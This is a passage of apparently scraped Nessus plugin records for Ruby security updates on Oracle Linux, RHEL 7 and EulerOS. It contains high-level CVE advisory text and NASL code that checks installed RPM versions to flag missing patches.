during\ninstallation of a given gem. A specially crafted gem could use this\nflaw to install files outside of the regular directory.\n(CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS\nresponses when requesting the hostname of the rubygems server for a\ndomain, via a _rubygems._tcp DNS SRV query. An attacker with the\nability to manipulate DNS responses could direct the gem command\ntowards a different domain. 
(CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable\nto an unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If\nlogs were printed in a terminal, an attacker could interact with the\nterminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially\ncrafted string to the application in order to crash the ruby\ninterpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize\ngems' specification text. A specially crafted gem could interact with\nthe terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU\nwhile parsing a sufficiently long gem summary. A specially crafted gem\nfrom a gem repository could freeze gem commands attempting to parse\nits summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of\nruby. An attacker with the ability to pass a specially crafted JSON\ninput to the extension could use this flaw to expose the interpreter's\nheap memory. (CVE-2017-14064)\n\n* The 'lazy_initialize' function in lib/resolv.rb did not properly\nprocess certain filenames. A remote attacker could possibly exploit\nthis flaw to inject and execute arbitrary commands. 
(CVE-2017-17790)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-February/007545.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-minitest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygems-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-devel-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-doc-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-irb-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-libs-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-tcltk-2.0.0.648-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-bigdecimal-1.2.0-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-io-console-0.4.2-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-json-1.7.7-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-minitest-4.3.2-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-psych-2.0.0-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-rake-0.9.6-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-rdoc-4.0.0-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygems-2.0.14.1-33.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygems-devel-2.0.14.1-33.el7_4\")) 
flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-devel / ruby-doc / ruby-irb / ruby-libs / ruby-tcltk / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:37:49", "description": "An update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker\ncould exploit this flaw to execute arbitrary commands by setting up a\nmalicious FTP server and tricking a user or Ruby application into\ndownloading files with specially crafted names using the Net::FTP\nmodule. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An\nattacker, with ability to control its format string parameter, could\nsend a specially crafted string that would disclose heap memory or\ncrash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during\ninstallation of a given gem. 
A specially crafted gem could use this\nflaw to install files outside of the regular directory.\n(CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS\nresponses when requesting the hostname of the rubygems server for a\ndomain, via a _rubygems._tcp DNS SRV query. An attacker with the\nability to manipulate DNS responses could direct the gem command\ntowards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable\nto an unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If\nlogs were printed in a terminal, an attacker could interact with the\nterminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially\ncrafted string to the application in order to crash the ruby\ninterpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize\ngems' specification text. A specially crafted gem could interact with\nthe terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU\nwhile parsing a sufficiently long gem summary. A specially crafted gem\nfrom a gem repository could freeze gem commands attempting to parse\nits summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of\nruby. An attacker with the ability to pass a specially crafted JSON\ninput to the extension could use this flaw to expose the interpreter's\nheap memory. (CVE-2017-14064)\n\n* The 'lazy_initialize' function in lib/resolv.rb did not properly\nprocess certain filenames. 
A remote attacker could possibly exploit\nthis flaw to inject and execute arbitrary commands. (CVE-2017-17790)", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-01T00:00:00", "title": "RHEL 7 : ruby (RHSA-2018:0378)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rubygems", "p-cpe:/a:redhat:enterprise_linux:ruby", "p-cpe:/a:redhat:enterprise_linux:rubygem-rdoc", "p-cpe:/a:redhat:enterprise_linux:rubygem-rake", "p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo", "p-cpe:/a:redhat:enterprise_linux:ruby-irb", "p-cpe:/a:redhat:enterprise_linux:rubygem-bigdecimal", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:ruby-doc", "cpe:/o:redhat:enterprise_linux:7.7", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:rubygem-psych", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:rubygems-devel", "p-cpe:/a:redhat:enterprise_linux:ruby-libs", "p-cpe:/a:redhat:enterprise_linux:rubygem-json", "p-cpe:/a:redhat:enterprise_linux:ruby-devel", "p-cpe:/a:redhat:enterprise_linux:rubygem-io-console", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:ruby-tcltk", "p-cpe:/a:redhat:enterprise_linux:rubygem-minitest"], "id": "REDHAT-RHSA-2018-0378.NASL", "href": "https://www.tenable.com/plugins/nessus/107082", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0378. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107082);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_xref(name:\"RHSA\", value:\"2018:0378\");\n\n script_name(english:\"RHEL 7 : ruby (RHSA-2018:0378)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker\ncould exploit this flaw to execute arbitrary commands by setting up a\nmalicious FTP server and tricking a user or Ruby application into\ndownloading files with specially crafted names using the Net::FTP\nmodule. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An\nattacker, with ability to control its format string parameter, could\nsend a specially crafted string that would disclose heap memory or\ncrash the interpreter. 
(CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during\ninstallation of a given gem. A specially crafted gem could use this\nflaw to install files outside of the regular directory.\n(CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS\nresponses when requesting the hostname of the rubygems server for a\ndomain, via a _rubygems._tcp DNS SRV query. An attacker with the\nability to manipulate DNS responses could direct the gem command\ntowards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable\nto an unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If\nlogs were printed in a terminal, an attacker could interact with the\nterminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially\ncrafted string to the application in order to crash the ruby\ninterpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize\ngems' specification text. A specially crafted gem could interact with\nthe terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU\nwhile parsing a sufficiently long gem summary. A specially crafted gem\nfrom a gem repository could freeze gem commands attempting to parse\nits summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of\nruby. An attacker with the ability to pass a specially crafted JSON\ninput to the extension could use this flaw to expose the interpreter's\nheap memory. 
(CVE-2017-14064)\n\n* The 'lazy_initialize' function in lib/resolv.rb did not properly\nprocess certain filenames. A remote attacker could possibly exploit\nthis flaw to inject and execute arbitrary commands. (CVE-2017-17790)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0898\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0899\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0901\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-0903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-10784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-14033\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-14064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17790\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-minitest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygems-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0378\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-debuginfo-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-devel-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-devel-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-doc-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-irb-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-libs-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-tcltk-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-tcltk-2.0.0.648-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-bigdecimal-1.2.0-33.el7_4\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-bigdecimal-1.2.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-io-console-0.4.2-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-io-console-0.4.2-33.el7_4\")) flag++;\n\n if (rpm_exists(rpm:\"rubygem-json-1.7\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-json-1.7.7-33.el7_4\")) flag++;\n\n if (rpm_exists(rpm:\"rubygem-json-1.7\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-json-1.7.7-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-minitest-4.3.2-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-psych-2.0.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-psych-2.0.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-rake-0.9.6-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-rdoc-4.0.0-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygems-2.0.14.1-33.el7_4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygems-devel-2.0.14.1-33.el7_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-debuginfo / ruby-devel / ruby-doc / ruby-irb / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:53:13", "description": "According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the 
Net::FTP module did not\n properly process filenames in combination with certain\n operations. A remote attacker could exploit this flaw\n to execute arbitrary commands by setting up a malicious\n FTP server and tricking a user or Ruby application into\n downloading files with specially crafted names using\n the Net::FTP module. (CVE-2017-17405)\n\n - A buffer underflow was found in ruby's sprintf\n function. An attacker, with ability to control its\n format string parameter, could send a specially crafted\n string that would disclose heap memory or crash the\n interpreter. (CVE-2017-0898)\n\n - It was found that rubygems did not sanitize gem names\n during installation of a given gem. A specially crafted\n gem could use this flaw to install files outside of the\n regular directory. (CVE-2017-0901)\n\n - A vulnerability was found where rubygems did not\n sanitize DNS responses when requesting the hostname of\n the rubygems server for a domain, via a _rubygems._tcp\n DNS SRV query. An attacker with the ability to\n manipulate DNS responses could direct the gem command\n towards a different domain. (CVE-2017-0902)\n\n - A vulnerability was found where the rubygems module was\n vulnerable to an unsafe YAML deserialization when\n inspecting a gem. Applications inspecting gem files\n without installing them can be tricked to execute\n arbitrary code in the context of the ruby interpreter.\n (CVE-2017-0903)\n\n - It was found that WEBrick did not sanitize all its log\n messages. If logs were printed in a terminal, an\n attacker could interact with the terminal via the use\n of escape sequences. (CVE-2017-10784)\n\n - It was found that the decode method of the\n OpenSSL::ASN1 module was vulnerable to buffer underrun.\n An attacker could pass a specially crafted string to\n the application in order to crash the ruby interpreter,\n causing a denial of service. 
(CVE-2017-14033)\n\n - A vulnerability was found where rubygems did not\n properly sanitize gems' specification text. A specially\n crafted gem could interact with the terminal via the\n use of escape sequences. (CVE-2017-0899)\n\n - It was found that rubygems could use an excessive\n amount of CPU while parsing a sufficiently long gem\n summary. A specially crafted gem from a gem repository\n could freeze gem commands attempting to parse its\n summary. (CVE-2017-0900)\n\n - A buffer overflow vulnerability was found in the JSON\n extension of ruby. An attacker with the ability to pass\n a specially crafted JSON input to the extension could\n use this flaw to expose the interpreter's heap memory.\n (CVE-2017-14064)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-03-20T00:00:00", "title": "EulerOS 2.0 SP2 : ruby (EulerOS-SA-2018-1067)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2018-03-20T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1067.NASL", "href": "https://www.tenable.com/plugins/nessus/108471", 